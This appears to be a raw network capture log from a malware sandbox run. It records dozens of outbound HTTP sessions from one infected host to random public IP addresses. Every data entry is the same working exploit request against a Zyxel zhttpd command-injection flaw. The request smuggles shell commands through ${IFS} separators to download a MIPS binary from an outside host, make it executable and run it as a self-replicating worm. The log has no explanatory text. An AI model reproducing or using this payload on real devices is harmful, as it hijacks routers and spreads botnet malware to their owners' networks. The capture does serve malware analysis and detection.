                                              Jan 29, 2024 07:03:43.885232925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2818192.168.2.1444586164.167.157.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885276079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2819192.168.2.1460502207.84.86.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885309935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2820192.168.2.145871075.103.199.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885344982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2821192.168.2.145391831.129.35.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885396004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2822192.168.2.1442698182.67.124.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885421991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2823192.168.2.1450038157.13.224.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885451078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2824192.168.2.143885445.100.191.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885508060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2825192.168.2.144744636.41.167.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885531902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2826192.168.2.1458420132.17.19.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885584116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2827192.168.2.1448108128.36.206.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885636091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2828192.168.2.14436345.159.214.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885668039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2829192.168.2.1442188186.99.81.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885719061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2830192.168.2.143900471.167.163.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885756969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2831192.168.2.1459964112.50.107.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885787010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2832192.168.2.145513213.43.21.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885835886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2833192.168.2.1448770218.193.115.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885865927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2834192.168.2.1442748193.154.243.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885905027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2835192.168.2.145044225.237.192.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885950089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2836192.168.2.1449112187.82.205.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886009932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2837192.168.2.144504852.36.135.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886045933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2838192.168.2.145710663.104.151.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886081934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2839192.168.2.144922818.246.84.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886132002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2840192.168.2.1459878129.21.122.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886162043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2841192.168.2.144297471.107.34.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886193991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2842192.168.2.1454056221.41.66.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886240005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2843192.168.2.14548844.126.202.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886295080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2844192.168.2.1452354148.137.236.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886317015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2845192.168.2.145366846.233.11.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886354923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2846192.168.2.14474422.156.228.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886379004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2847192.168.2.145931899.32.122.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886409998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2848192.168.2.14415784.37.45.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886450052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2849192.168.2.146088285.108.197.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886523962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2850192.168.2.1451738144.26.55.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886555910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2851192.168.2.1438996194.169.155.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886595011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2852192.168.2.1433426168.74.3.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886639118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2853192.168.2.145229895.213.67.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886672020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2854192.168.2.1435130148.111.226.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886697054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2855192.168.2.1437694204.173.45.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886738062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2856192.168.2.144942676.204.17.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886787891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2857192.168.2.1436848205.71.95.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886823893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2858192.168.2.145398036.248.17.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886846066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2859192.168.2.1456122180.195.203.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886898041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2860192.168.2.145482890.47.237.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886924028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2861192.168.2.1454850125.56.223.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886970997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2862192.168.2.1452318146.212.196.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.886998892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2863192.168.2.1438806155.213.53.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887026072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2864192.168.2.143501094.17.184.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887072086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2865192.168.2.1437550134.98.115.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887123108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2866192.168.2.144996827.239.54.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887171984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2867192.168.2.1445896125.44.112.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887204885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2868192.168.2.143574060.248.10.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887242079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2869192.168.2.144787235.199.56.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887274027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2870192.168.2.1458476132.206.77.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887312889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2871192.168.2.143801278.80.9.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887358904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2872192.168.2.144420064.124.91.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887397051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2873192.168.2.144900690.193.202.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887415886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2874192.168.2.1444192100.51.138.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887456894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2875192.168.2.144994068.101.249.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887501001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2876192.168.2.1451292211.184.36.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887516022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2877192.168.2.1442792148.198.111.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887564898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2878192.168.2.1442554196.27.215.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887595892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2879192.168.2.145323439.170.71.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887628078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2880192.168.2.1435926195.155.85.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887671947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2881192.168.2.1453728159.156.105.70443
                                              TimestampBytes transferredDirectionData
